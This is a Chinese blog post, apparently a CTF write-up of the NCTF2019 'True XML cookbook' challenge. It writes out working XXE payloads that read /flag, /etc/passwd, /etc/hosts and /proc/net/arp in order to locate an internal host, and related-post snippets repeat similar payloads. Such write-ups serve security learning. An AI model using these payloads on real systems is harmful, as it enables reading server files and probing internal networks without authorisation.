[NCTF2019]True XML cookbook 1

最新推荐文章于 2024-05-10 12:02:09 发布
最新推荐文章于 2024-05-10 12:02:09 发布
阅读量711 收藏
点赞数 1
文章标签: xml ctf 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53460654/article/details/117398811
版权

之前写了个fake
这次又来个ture
打开环境
在这里插入图片描述
明确是xxe
直接抓包
在这里插入图片描述
回显位还是1
试试直接读flag

<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///flag">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>

报错,预料之中,没这么简单
在这里插入图片描述

/etc/hosts 储存域名解析的缓存
/etc/passwd 用户密码
/proc/net/arp 每个网络接口的arp表中dev包

先查看/etc/passwd

<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///etc/passwd">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>

在这里插入图片描述
没什么发现
再看看/etc/hosts

<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///etc/hosts">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>

在这里插入图片描述
也没内网主机ip
再试试/proc/net/arp

<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///proc/net/arp">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>

在这里插入图片描述
发现内网主机ip
在这里插入图片描述
得到flag
希望这篇文章能够帮助你!

M1kael
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[NCTF2019]True XML cookbook
missht0的博客
01-30 390
[NCTF2019]True XML cookbook 抓包,发现存在XXE漏洞 添加外部注入实体 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY file SYSTEM "file:///flag"> ]> <user> <username>&admin;</username> <password>password<
[NCTF2019]True XML cookbook 1(XML)
weixin_45577185的博客
10-20 329
总结一下知识点: 抓包,插入恶意XML外部实体 /etc/hosts 储存域名解析的缓存 /etc/passwd 用户密码 /proc/net/arp 每个网络接口的arp表中dev包 直接用下面的代码读取flag会报错 <?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY M1kael SYSTEM "file:///flag"> ]> <user> <username>&M1kael;&lt
5月10日学习记录
weixin_74020633的博客
05-10 727
这题是关于xxe漏洞的实际应用,利用xxe漏洞的外部实体来进行ssrf探针内网的主机和[NCTF2019]Fake XML cookbook的区别就在于xxe漏洞的利用方向,一个是命令执行,一个是SSRF看题,打开环境,熟悉的登录框正常的抓包进行分析,明显的xxe漏洞开始构造,先查看xxe漏洞能不能正常利用存在xxe漏洞并且能够正常利用,我在做题时想的是直接查看flag文件报错了,说明flag这个文件不存在,也许我们在外网不能正常访问,xxe的漏洞利用就可以探针内网,尝试访问内网看看。
BUU [NCTF2019]True XML cookbook
qq_62078839的博客
04-19 1860
打开连接 熟悉的界面,我们就不做黑盒测试了,直接抓包修改xml payload:<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user><username>&admin;</username><password>123456</passwo...
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
全国大学生电子设计大赛之历年.7z
09-19
1. **电路设计**:历年的大赛中,电路设计是基础且重要的环节,包括模拟电路、数字电路、电源电路等。参赛者需要掌握电路分析、设计与仿真工具,如Multisim或LTSpice,理解基本元器件的工作原理和应用。 2. **...
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
[NCTF2019]Fake XML cookbook(特详解)
热门推荐
qq_74806534的博客
01-30 2万+
攻击者可以通过构造恶意的 XML 文档将其发送到应用程序中,在解析该文档时,XML 解析器会加载外部实体(如文件、URL等),以便在文档中引用它们。PHP 默认使用 libxml 来解析 XML,但是从 libxml 2.9.0 开始,它默认不再解析外部实体,导致 PHP 下的 XXE 漏洞已经逐渐消失,除非你指定 LIBLXML_NOENT 去开启外部实体解析,才会存在 XXE 漏洞。4.在成功回调函数中,根据返回的 XML 数据解析出登录结果的代码和消息,然后根据不同的结果更新页面上的提示信息。
[NCTF2019]True XML cookbook --不会编程的崽
不会编程的崽的博客
02-21 930
xxe ssrf 配合
[NCTF 2019]True XML cookbook
m0_70819573的博客
04-21 368
不能直接在根目录读取flag,但可以通过/etc/hosts获取内网。再通过扫描c段获得flag。
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M1kael

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值